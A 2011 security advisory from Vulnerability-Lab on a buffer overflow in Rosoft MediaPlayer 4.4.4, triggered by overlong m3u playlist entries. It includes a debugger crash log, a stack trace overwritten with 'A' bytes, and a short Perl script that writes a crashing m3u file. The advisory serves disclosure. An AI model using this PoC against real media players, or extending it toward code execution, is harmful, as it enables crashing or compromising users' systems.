Document Title: =============== Rosoft MediaPlayer v4.4.4 - Buffer Overflow Vulnerability Release Date: ============= 2011-06-21 Vulnerability Laboratory ID (VL-ID): ==================================== 94 Product & Service Introduction: =============================== Ever since we released our very first multimedia program 1999 we have kept on improving the programs to fit our users need. Over the years we have come up with four programs that do pretty much what you need when it comes to the ordinary audio demands. We have four programs, Rosoft Audio Converter, Rosoft Audio Recorder, Rosoft CD Extractor and Rosoft Media Player. Our programs targets none advanced users although an advanced user may well find our tools useful. Our goal has been to create tools that are easy to use. Below you have a list of some of all the download sites where you can find our programs. (Copy of the Vendor Homepage: http://www.rosoftengineering.com/Default.aspx) Abstract Advisory Information: ============================== Vulnerability-Lab Team discovered a Buffer overflow Vulnerability on Rosofts MediaPlayer Free - Silver Edition. Vulnerability Disclosure Timeline: ================================== 2011-06-21: Public or Non-Public Disclosure Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A Buffer Overflow vulnerability is detected on Rosofts MediaPlayer v4.4.4 Due a lack of the input validation check while loading the file a buffer overflow can crash the program. The bug can very likely be used to overflow the program and take control over the system privileged user account process of the service. --- Exception Logs --- (3f8.310): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=001a27d2 ebx=00000041 ecx=0012fff5 edx=0000ad30 esi=7ffb0222 edi=00000010 eip=7c91302c esp=0012e4f8 ebp=0012e504 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 ntdll!RtlUnicodeToMultiByteN+0x91: 7c91302c 88590b mov byte ptr [ecx+0Bh],bl ds:0023:00130000=41 --- Stacktext Logs --- WARNING: Stack unwind information not available. Following frames may be wrong. 0012e504 77d202a5 0012e9cc 000186b0 0012e544 ntdll!RtlUnicodeToMultiByteN+0x91 0012e52c 77d46c30 00000000 0019fb80 0000c358 USER32!WCSToMBEx+0x7e 0012e554 77d2f7c0 00160970 00000000 00000001 USER32!GetClipboardFormatNameA+0x68eb 0012e5e0 77d36175 00720298 00000189 00000000 USER32!WINNLSGetIMEHotkey+0x2681 0012e600 77d18709 000502b6 00000189 00000000 USER32!SetDlgItemTextA+0xa0 0012e62c 77d187eb 77d36129 000502b6 00000189 USER32!GetDC+0x72 0012e694 77d1c00e 00000000 77d36129 000502b6 USER32!GetDC+0x154 0012e6c4 77d1e366 77d36129 000502b6 00000189 USER32!DestroyCaret+0x5e 0012e6e4 0043dc93 77d36129 000502b6 00000189 USER32!CallWindowProcA+0x1b 0012e850 0042818b 0012e910 00a00f53 00aad1ec image00400000+0x3dc93 0012e890 0042b5e2 00000189 00000000 0012e9cc image00400000+0x2818b 0012e8a8 77d18709 000502b6 00000189 00000000 image00400000+0x2b5e2 0012e8d4 77d187eb 00a00f53 000502b6 00000189 USER32!GetDC+0x72 0012e93c 77d1b743 00000000 00a00f53 000502b6 USER32!GetDC+0x154 0012e978 77d1e2f7 00720298 00720230 00000000 USER32!GetParent+0x16c 0012e998 00427498 000502b6 00000189 00000000 USER32!SendMessageA+0x49 0012f9d0 41414141 41414141 41414141 41414141 image00400000+0x27498 0012f9d4 41414141 41414141 41414141 41414141 0x41414141 0012f9d8 41414141 41414141 41414141 41414141 0x41414141 0012f9dc 41414141 41414141 41414141 41414141 0x41414141 0012f9e0 41414141 41414141 41414141 41414141 0x41414141 0012f9e4 41414141 41414141 41414141 41414141 0x41414141 0012f9e8 41414141 41414141 41414141 41414141 0x41414141 0012f9ec 41414141 41414141 41414141 41414141 0x41414141 0012f9f0 41414141 41414141 41414141 41414141 0x41414141 0012f9f4 41414141 41414141 41414141 41414141 0x41414141 0012f9f8 41414141 41414141 41414141 41414141 0x41414141 0012f9fc 41414141 41414141 41414141 41414141 0x41414141 0012fa00 41414141 41414141 41414141 41414141 0x41414141 0012fa04 41414141 41414141 41414141 41414141 0x41414141 0012fa08 41414141 41414141 41414141 41414141 0x41414141 0012fa0c 41414141 41414141 41414141 41414141 0x41414141 0012fa10 41414141 41414141 41414141 41414141 0x41414141 0012fa14 41414141 41414141 41414141 41414141 0x41414141 0012fa18 41414141 41414141 41414141 41414141 0x41414141 0012fa1c 41414141 41414141 41414141 41414141 0x41414141 0012fa20 41414141 41414141 41414141 41414141 0x41414141 0012fa24 41414141 41414141 41414141 41414141 0x41414141 0012fa28 41414141 41414141 41414141 41414141 0x41414141 0012fa2c 41414141 41414141 41414141 41414141 0x41414141 ... Pictures: ../1.png Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers via stream or by local attackers to escalate out of the software process. For demonstration or reproduce ... my $sploitfile="vlab.m3u"; print " [+] Preparing payload\n"; my $header = "http://"; my $junk = "A" x 50000; my $payload = $header.$junk; print " [+] Writing payload to file\n"; open(sploitf,">$sploitfile"); print sploitf $payload; close(sploitf); print " [+] PoC file " . sploitfile . " created\n"; print " [+] Wrote " . length($payload) . " bytes\n"; Security Risk: ============== The security risk of the buffer overflow vulnerability via m3u files is estimated as high. Credits & Authors: ================== Vulnerability Research Laboratory - X4lt Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory